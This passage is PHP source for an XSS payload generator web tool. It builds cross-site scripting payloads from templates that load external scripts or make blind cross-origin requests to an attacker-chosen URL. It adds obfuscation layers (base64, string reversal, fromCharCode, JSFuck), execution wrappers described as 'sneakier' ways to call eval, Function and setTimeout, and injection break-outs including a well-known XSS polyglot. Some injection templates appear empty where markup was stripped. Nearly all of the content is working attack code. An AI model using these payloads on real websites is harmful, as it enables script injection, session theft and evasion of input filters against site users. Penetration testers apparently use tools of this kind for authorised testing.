"Load script ($.getScript())", "desc" => "Load an external script into the DOM using jQuery, if jQuery is already loaded into the DOM", "code" => "$.getScript(\"{url}\")", "fields" => "filepicker,url" ], [ "name" => "Load script (document.createElement())", "desc" => "Load an external script into the DOM using native document.createElement() methods", "code" => "e=document.createElement(\"script\");e.src=\"{url}\";document.body.appendChild(e);", "fields" => "filepicker,url" ], [ "name" => "Request URL (img)", "desc" => "Make a blind, cross-origin request to an arbitrary URL (tip: use a Burp collaborator URL)", "code" => "new Image().src=\"{url}\"", "fields" => "url" ], [ "name" => "Request URL (XHR)", "desc" => "Make a same-origin or CORS request to an arbitrary URL", "code" => "x=new XMLHttpRequest();x.open(\"GET\",\"{url}\");x.send()", "fields" => "url" ], [ "name" => "JavaScript code", "desc" => "Inject custom inline JavaScript code", "code" => "{js}", "fields" => "js" ] /* [ "name" => "Dropper (multiple scripts / automatic payload)", "desc" => "Load a set of scripts using this dropper to determine the best payload", "code" => "" ], */ ]; /* Obfuscation - None - base64 (btoa()) - reverse - String.fromCharCode() - character hex code */ $aObfuscation = [ [ "name" => "None", "desc" => "No obfuscation", "code" => "{payload}" ], [ "name" => "Pass as string", "desc" => "Pass the payload as a string into an execution method", "code" => "'{payload}'" ], [ "name" => "Base64 (atob())", "desc" => "Base64 encode", "code" => "atob('{payloadb64}')" ], [ "name" => "Reverse", "desc" => "Reverse payload string and execute using eval()", "code" => "'{payloadrev}'.split('').reverse().join('')" ], [ "name" => "String.fromCharCode()", "desc" => "Build payload string one char at a time using the ordinal value", "code" => "{payloadchr}" ], [ "name" => "Character hex codes", "desc" => "Construct the payload using hex value of each character", "code" => "'{payloadhex}'" ], [ "name" => "JSF*ck", "desc" => "Encode payload using only the characters []()!+", "code" => "{payloadjsf}" ] ]; $aExecution = [ [ "name" => "None", "desc" => "No execution required", "code" => "{obfuscated}" ], [ "name" => "eval()", "desc" => "Pass string to eval() function", "code" => "eval({obfuscated})" ], [ "name" => "window['eval']()", "desc" => "Slightly sneakier way of calling eval()", "code" => "window['eval']({obfuscated})" ], [ "name" => "window['\\x65\\x76\\x61\\x6c']()", "desc" => "Even sneakier way of calling eval()", "code" => "window['\\x65\\x76\\x61\\x6c']({obfuscated})" ], [ "name" => "Function()()", "desc" => "Declare and execute an anonymous function", "code" => "Function({obfuscated})()" ], [ "name" => "window['Function']()()", "desc" => "Slightly sneakier way of creating a new anonymous function", "code" => "window['Function']({obfsucated})()" ], [ "name" => "window['\\x46\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e']()()", "desc" => "Even sneakier way of creating a new anonymous function", "code" => "window['\\x46\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e']({obfuscated})()" ], [ "name" => "setTimeout()", "desc" => "Pass code string to the setTimeout() function", "code" => "setTimeout({obfuscated},0)" ], [ "name" => "window['setTimeout']()", "desc" => "Slightly sneakier way of calling the setTimeout() function", "code" => "window['setTimeout']({obfuscated},0)" ], [ "name" => "window['\\x73\\x65\\x74\\x54\\x69\\x6d\\x65\\x6f\\x75\\x74']()", "desc" => "Even sneakier way of calling the setTimeout() function", "code" => "window['\\x73\\x65\\x74\\x54\\x69\\x6d\\x65\\x6f\\x75\\x74']({obfuscated},0)" ] ]; /* Injection - Basic polyglot / inline script - 0xsobky - Ultimate XSS Polyglot - String variable escape - img element onerror - SVG element - Element onclick - Element onmouseover */ $aInjections = [ [ "name" => "Basic polyglot / inline script", "desc" => "Code execution using basic break-out technique", "code" => "'\">" ], [ "name" => "0xsobky - Ultimate XSS Polyglot", "desc" => "Long, very flexible payload good for blind injection and fuzzing", "code" => "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcliCk={payload} )//%0D%0A%0d%0a//\\x3csVg/\\x3e" ], [ "name" => "String variable escape", "desc" => "Break out from within a string in block of JavaScript", "code" => "\";//';\n{payload}" ], [ "name" => "img element onerror", "desc" => "Inject an invalid element with the payload within onerror", "code" => "" ], [ "name" => "SVG element", "desc" => "Inject an SVG element containing the payload within onload", "code" => "" ], [ "name" => "Element onclick", "desc" => "Break out of an element attribute and add an onclick event", "code" => "'\" onclick={payload} >" ], [ "name" => "Element onmouseover", "desc" => "Break out of an element attribute and add an onmouseover event", "code" => "'\" onmouseover={payload} >" ], [ "name" => "Custom element and event", "desc" => "Define an element and an event to execute the payload", "code" => "<{element}/{event}={payload} />", "fields" => "element,event" ] ]; $aElements = [ "a", "abbr", "acronym", "address", "applet", "area", "article", "aside", "audio", "b", "base", "basefont", "bdi", "bdo", "big", "blockquote", "body", "br", "button", "canvas", "caption", "center", "cite", "code", "col", "colgroup", "data", "datalist", "dd", "del", "details", "dfn", "dialog", "dir", "div", "dl", "dt", "em", "embed", "fieldset", "figcaption", "figure", "font", "footer", "form", "frame", "frameset", "h1 to h6", "head", "header", "hr", "html", "i", "iframe", "img", "input", "ins", "kbd", "label", "legend", "li", "link", "main", "map", "mark", "meta", "meter", "nav", "noframes", "noscript", "object", "ol", "optgroup", "option", "output", "p", "param", "picture", "pre", "progress", "q", "rp", "rt", "ruby", "s", "samp", "script", "section", "select", "small", "source", "span", "strike", "strong", "style", "sub", "summary", "sup", "svg", "table", "tbody", "td", "template", "textarea", "tfoot", "th", "thead", "time", "title", "tr", "track", "tt", "u", "ul", "var", "video", "wbr" ]; $aEvents = [ "onabort", "oncancel", "onblur", "oncanplay", "oncanplaythrough", "onchange", "onclick", "oncontextmenu", "ondblclick", "ondrag", "ondragend", "ondragenter", "ondragexit", "ondragleave", "ondragover", "ondragstart", "ondrop", "ondurationchange", "onemptied", "onended", "onerror", "onfocus", "onformchange", "onforminput", "oninput", "oninvalid", "onkeydown", "onkeypress", "onkeyup", "onload", "onloadeddata", "onloadedmetadata", "onloadstart", "onmousedown", "onmousemove", "onmouseout", "onmouseover", "onmouseup", "onmousewheel", "onpause", "onplay", "onplaying", "onprogress", "onratechange", "onreadystatechange", "onscroll", "onseeked", "onseeking", "onselect", "onshow", "onstalled", "onsubmit", "onsuspend", "ontimeupdate", "onvolumechange", "onwaiting" ]; // Character substitution // Encoding $aEncoding = [ [ "name"=>"JSON", "desc"=>"Encode for inclusion in a JSON string (escape double quotes)", "func"=>"str_replace", "args"=>['"','\"','[payload]'] ], [ "name"=>"JS Unicode", "desc"=>"Encode as JavaScript unicode escaped string", "func"=>"unicode_escape", "args"=>['[payload]'] ], [ "name"=>"JS Hex", "desc"=>"Encode as JavaScript hex escaped string", "func"=>"hex_escape", "args"=>['[payload]'] ], [ "name"=>"URL", "desc"=>"URL encode key characters", "func"=>"urlencode", "args"=>["[payload]"] ], [ "name"=>"SQL", "desc"=>"Escape strings for SQL statements", "func"=>"addslashes", "args"=>["[payload]"] ], [ "name"=>"HTML", "desc"=>"Encode HTML characters", "func"=>"htmlspecialchars", "args"=>["[payload]"] ], [ "name"=>"Base64", "desc"=>"Base 64 encode payload", "func"=>"base64_encode", "args"=>["[payload]"] ] ]; function unicode_escape( $payload ){ $rtn = ''; for ($i = 0; $i < strlen($payload); $i++) { $rtn .= '\\u' . str_pad(dechex(ord($payload[$i])), 4, '0', STR_PAD_LEFT); } return $rtn; } function hex_escape( $payload ){ return str_replace( '\\u00','\\x',unicode_escape( $payload ) ); } // JSFuck: http://www.jsfuck.com/ // JSFuck PHP port: https://github.com/Zaczero/jsfuck.php class JSFuck { private const MIN = 32; private const MAX = 126; private const USE_CHAR_CODE = 'USE_CHAR_CODE'; private const SIMPLE = [ 'false' => '![]', 'true' => '!![]', 'undefined' => '[][[]]', 'NaN' => '+[![]]', 'Infinity' => '+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]]+[+[]])', ]; private const CONSTRUCTORS = [ 'Array' => '[]', 'Number' => '(+[])', 'String' => '([]+[])', 'Boolean' => '(![])', 'RegExp' => 'Function("return/"+false+"/")()', 'Function' => '[]["fill"]', ]; private $_MAPPING = [ 'a' => '(false+"")[1]', 'b' => '([]["entries"]()+"")[2]', 'c' => '([]["fill"]+"")[3]', 'd' => '(undefined+"")[2]', 'e' => '(true+"")[3]', 'f' => '(false+"")[0]', 'g' => '(false+[0]+String)[20]', 'h' => '(+(101))["to"+String["name"]](21)[1]', 'i' => '([false]+undefined)[10]', 'j' => '([]["entries"]()+"")[3]', 'k' => '(+(20))["to"+String["name"]](21)', 'l' => '(false+"")[2]', 'm' => '(Number+"")[11]', 'n' => '(undefined+"")[1]', 'o' => '(true+[]["fill"])[10]', 'p' => '(+(211))["to"+String["name"]](31)[1]', 'q' => '(+(212))["to"+String["name"]](31)[1]', 'r' => '(true+"")[1]', 's' => '(false+"")[3]', 't' => '(true+"")[0]', 'u' => '(undefined+"")[0]', 'v' => '(+(31))["to"+String["name"]](32)', 'w' => '(+(32))["to"+String["name"]](33)', 'x' => '(+(101))["to"+String["name"]](34)[1]', 'y' => '(NaN+[Infinity])[10]', 'z' => '(+(35))["to"+String["name"]](36)', 'A' => '(+[]+Array)[10]', 'B' => '(+[]+Boolean)[10]', 'C' => 'Function("return escape")()(("")["italics"]())[2]', 'D' => 'Function("return escape")()([]["fill"])["slice"]("-1")', 'E' => '(RegExp+"")[12]', 'F' => '(+[]+Function)[10]', 'G' => '(false+Function("return Date")()())[30]', 'H' => JSFuck::USE_CHAR_CODE, 'I' => '(Infinity+"")[0]', 'J' => JSFuck::USE_CHAR_CODE, 'K' => JSFuck::USE_CHAR_CODE, 'L' => JSFuck::USE_CHAR_CODE, 'M' => '(true+Function("return Date")()())[30]', 'N' => '(NaN+"")[0]', 'O' => '(NaN+Function("return{}")())[11]', 'P' => JSFuck::USE_CHAR_CODE, 'Q' => JSFuck::USE_CHAR_CODE, 'R' => '(+[]+RegExp)[10]', 'S' => '(+[]+String)[10]', 'T' => '(NaN+Function("return Date")()())[30]', 'U' => '(NaN+Function("return{}")()["to"+String["name"]]["call"]())[11]', 'V' => JSFuck::USE_CHAR_CODE, 'W' => JSFuck::USE_CHAR_CODE, 'X' => JSFuck::USE_CHAR_CODE, 'Y' => JSFuck::USE_CHAR_CODE, 'Z' => JSFuck::USE_CHAR_CODE, ' ' => '(NaN+[]["fill"])[11]', '!' => JSFuck::USE_CHAR_CODE, '"' => '("")["fontcolor"]()[12]', '#' => JSFuck::USE_CHAR_CODE, '$' => JSFuck::USE_CHAR_CODE, '%' => 'Function("return escape")()([]["fill"])[21]', '&' => '("")["link"](0+")[10]', '\'' => JSFuck::USE_CHAR_CODE, '(' => '(undefined+[]["fill"])[22]', ')' => '([0]+false+[]["fill"])[20]', '*' => JSFuck::USE_CHAR_CODE, '+' => '(+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]])+[])[2]', ',' => '([]["slice"]["call"](false+"")+"")[1]', '-' => '(+(.+[0000000001])+"")[2]', '.' => '(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]', '/' => '(false+[0])["italics"]()[10]', ':' => '(RegExp()+"")[3]', ';' => '("")["link"](")[14]', '<' => '("")["italics"]()[0]', '=' => '("")["fontcolor"]()[11]', '>' => '("")["italics"]()[2]', '?' => '(RegExp()+"")[2]', '@' => JSFuck::USE_CHAR_CODE, '[' => '([]["entries"]()+"")[0]', '\\' => JSFuck::USE_CHAR_CODE, ']' => '([]["entries"]()+"")[22]', '^' => JSFuck::USE_CHAR_CODE, '_' => JSFuck::USE_CHAR_CODE, '`' => JSFuck::USE_CHAR_CODE, '{' => '(true+[]["fill"])[20]', '|' => JSFuck::USE_CHAR_CODE, '}' => '([]["fill"]+"")["slice"]("-1")', '~' => JSFuck::USE_CHAR_CODE, ]; private const GLOBAL = 'Function("return this")()'; public function __construct(string $compilePath = "jsfuck.data") { if(file_exists($compilePath)) { $data = file_get_contents("jsfuck.data"); $this->_MAPPING = unserialize($data); } else { $this->FillMissingChars(); $this->FillMissingDigits(); $this->ReplaceMap(); $this->ReplaceStrings(); $data = serialize($this->_MAPPING); file_put_contents("jsfuck.data", $data); } } public function Encode(string $input, bool $wrapWithEval = false, bool $runInParentScope = false) : string { $output = []; $r = ""; foreach(JSFuck::SIMPLE as $i => $val) { $r .= "$i|"; } $r .= "."; if(preg_match_all("/$r/", $input, $matches)) { foreach($matches[0] as $find) { if(key_exists($find, JSFuck::SIMPLE)) { $output[] = "[".JSFuck::SIMPLE[$find]."]+[]"; } else if(key_exists($find, $this->_MAPPING)) { $output[] = $this->_MAPPING[$find]; } else { $replacement = "([]+[])[".$this->Encode("constructor")."][".$this->Encode("fromCharCode")."](".$this->Encode((string) ord($find)).")"; $output[] = $replacement; $this->_MAPPING[$find] = $replacement; } } } $output = join("+", $output); if(preg_match("/^\d$/", $input)) { $output .= "+[]"; } if($wrapWithEval) { if($runInParentScope) { $output = "[][".$this->Encode("fill")."][".$this->Encode("constructor")."](".$this->Encode("return eval").")()($output)"; } else { $output = "[][".$this->Encode("fill")."][".$this->Encode("constructor")."]($output)()"; } } return $output; } private function FillMissingChars() { foreach($this->_MAPPING as $key => $value) { if($value === JSFuck::USE_CHAR_CODE) { $charCode = ord($key); $charCodeHex = dechex($charCode); $replace = preg_replace('/(\d+)/', '+($1)+"', $charCodeHex); $this->_MAPPING[$key] = 'Function("return unescape")()("%"'.$replace.'")'; } } } private function FillMissingDigits() { for($number = 0; $number < 10; $number++) { $output = "+[]"; if($number > 0) { $output = "+!$output"; } for($i = 1; $i < $number; $i++) { $output = "+!+[]$output"; } if($number > 1) { $output = substr($output, 1); } $this->_MAPPING[$number] = "[$output]"; } } private function ReplaceMap() { for($i = JSFuck::MIN; $i <= JSFuck::MAX; $i++) { $char = chr($i); $value = $this->_MAPPING[$char]; if(empty($value)) { continue; } foreach(JSFuck::CONSTRUCTORS as $key => $val) { $value = preg_replace("/\b$key/", $val.'["constructor"]', $value); } foreach(JSFuck::SIMPLE as $key => $val) { $value = preg_replace("/$key/", $val, $value); } $value = $this->NumberReplacer($value, "/(\d\d+)/i"); $value = $this->DigitReplacer($value, "/\((\d)\)/i"); $value = $this->DigitReplacer($value, "/\[(\d)\]/i"); $value = preg_replace("/GLOBAL/", JSFuck::GLOBAL, $value); $value = preg_replace("/\+\"\"/", "+[]", $value); $value = preg_replace("/\"\"/", "[]+[]", $value); $this->_MAPPING[$char] = $value; } } private function ReplaceStrings() { foreach($this->_MAPPING as $key => $value) { $this->_MAPPING[$key] = $this->MappingReplacer((string) $value, "/\"([^\"]+)\"/i"); } $count = JSFuck::MAX - JSFuck::MIN; while(true) { $missing = $this->FindMissing(); if(count($missing) == 0) { break; } foreach($missing as $key => $value) { $value = $this->ValueReplacer($value, "/[^\[\]\(\)\!\+]{1}/", $missing); $this->_MAPPING[$key] = $value; } if($count-- === 0) { throw new Exception("Could not compile the following chars: ".json_encode($this->FindMissing())); } } } private function FindMissing() : array { $missing = []; foreach($this->_MAPPING as $key => $value) { if(preg_match("/[^\[\]\(\)\!\+]{1}/", $value)) { $missing[$key] = $value; } } return $missing; } private function NumberReplacer(string $value, string $pattern) : string { if(preg_match_all($pattern, $value, $matches, PREG_OFFSET_CAPTURE)) { for($i = count($matches[0]) - 1; $i >= 0; $i--) { $find = $matches[0][$i][0]; $offs = $matches[0][$i][1]; $begin = substr($value, 0, $offs); $end = substr($value, $offs + strlen($find)); $values = []; for($j = 0; $j < strlen($find); $j++) { $values[$j] = $find[$j]; } $head = (int) array_shift($values); $output = "+[]"; if($head > 0) { $output = "+!$output"; } for($j = 1; $j < $head; $j++) { $output = "+!+[]$output"; } if($head > 1) { $output = substr($output, 1); } $merged = array_merge([$output], $values); $joined = join("+", $merged); $value = $begin.$this->DigitReplacer($joined, "/(\d)/").$end; } } return $value; } private function DigitReplacer(string $value, string $pattern) : string { if(preg_match_all($pattern, $value, $matches, PREG_OFFSET_CAPTURE)) { for($i = count($matches[1]) - 1; $i >= 0; $i--) { $find = $matches[1][$i][0]; $offs = $matches[1][$i][1]; $begin = substr($value, 0, $offs); $end = substr($value, $offs + strlen($find)); $value = $begin.$this->_MAPPING[$find].$end; } } return $value; } private function MappingReplacer(string $value, string $pattern) : string { if(preg_match_all($pattern, $value, $matches, PREG_OFFSET_CAPTURE)) { for($i = count($matches[1]) - 1; $i >= 0; $i--) { $find = $matches[1][$i][0]; $offs = $matches[1][$i][1]; $begin = substr($value, 0, $offs - 1); $end = substr($value, $offs + strlen($find) + 1); $values = []; for($j = 0; $j < strlen($find); $j++) { $values[$j] = $find[$j]; } $value = $begin.join("+", $values).$end; } } return $value; } private function ValueReplacer(string $value, string $pattern, array $missing) : string { if(preg_match_all($pattern, $value, $matches, PREG_OFFSET_CAPTURE)) { for($i = count($matches[0]) - 1; $i >= 0; $i--) { $find = $matches[0][$i][0]; $offs = $matches[0][$i][1]; $begin = substr($value, 0, $offs); $end = substr($value, $offs + strlen($find)); if(!key_exists($find, $missing)) { $value = $begin.$this->_MAPPING[$find].$end; } else { $value = $value; } } } return $value; } } // Logic for generating a payload function generatePayload( $form ){ global $aPayloads, $aObfuscation, $aExecution, $aInjections, $aEncoding; $required = ['payloadid','injectionid','obfuscationid','executionid','encoding_used']; foreach( $required as $item ){ if( !in_array( $item, array_keys( $form ) ) ) return $item." not provided"; } $rtn = []; $rtn['meta'] = []; if( !in_array( $form['payloadid'], array_keys( $aPayloads ) ) ) $form['payloadid'] = 0; $payload = $aPayloads[$form['payloadid']]; $rtn['meta']['payload'] = $payload; // Replace values in code with form values $fields = explode( ",", $payload["fields"] ); $code = $payload['code']; foreach( $fields as $f ){ if( !in_array( $f, array_keys( $form ) ) ) continue; $code = str_replace( '{'.$f.'}', $form[$f], $code ); } $rtn['payload'] = $code; // Prepare payloads $prep = []; $prep['payload'] = $code; $prep['payloadb64'] = base64_encode( $code ); $prep['payloadrev'] = strrev( $code ); $chrs = []; for( $i=0; $iEncode($code); $rtn['prepared'] = $prep; // Obfuscate code using chosen method if( !in_array( $form['obfuscationid'], array_keys( $aObfuscation ) ) ) $form['obfuscationid'] = 0; $obfuscation = $aObfuscation[$form['obfuscationid']]; $rtn['meta']['obfuscation'] = $obfuscation; $code = $obfuscation['code']; foreach( $prep as $k => $v ){ $code = str_replace( '{'.$k.'}', $v, $code ); } $rtn['obfuscated'] = $code; // Add into execution method if( !in_array( $form['executionid'], array_keys( $aExecution ) ) ) $form['executionid'] = 0; $execution = $aExecution[$form['executionid']]; $rtn['meta']['execution'] = $execution; $code = str_replace( '{obfuscated}', $rtn['obfuscated'], $execution['code'] ); $rtn['execute'] = $code; // Insert into injection string if( !in_array( $form['injectionid'], array_keys( $aInjections ) ) ) $form['injectionid'] = 0; $injection = $aInjections[$form['injectionid']]; $rtn['meta']['injection'] = $injection; $code = str_replace( '{payload}', $code, $injection['code'] ); // Custom injection if( array_key_exists( 'fields', $injection ) ){ $fields = explode( ",", $injection["fields"] ); foreach( $fields as $f ){ if( !in_array( $f, array_keys( $form ) ) ) continue; $code = str_replace( '{'.$f.'}', $form[$f], $code ); } } // Encoding if( !empty($form["encoding_used"]) ){ $encs = preg_split("/,/",$form["encoding_used"]); foreach( $encs as $ename ){ foreach( $aEncoding as $e ){ if( $e["name"] == $ename ) break; } $args = []; foreach( $e["args"] as $a ){ $args[] = str_replace( "[payload]", $code, $a ); } $code = call_user_func_array( $e["func"], $args ); } } $rtn['payload'] = $code; $rtn['inject'] = $code; return $rtn; } // Generate the actual payload if( $_GET['mode'] == 'ajax' ){ header('Content-Type: text/json'); $rtn = generatePayload( $_GET ); echo json_encode( $rtn ); exit; } // Show form to generate a payload if( empty( $_GET["mode"] ) || $_GET["mode"] == "generate"){ ?> XSS Payload Generator

XSS Payload Generator
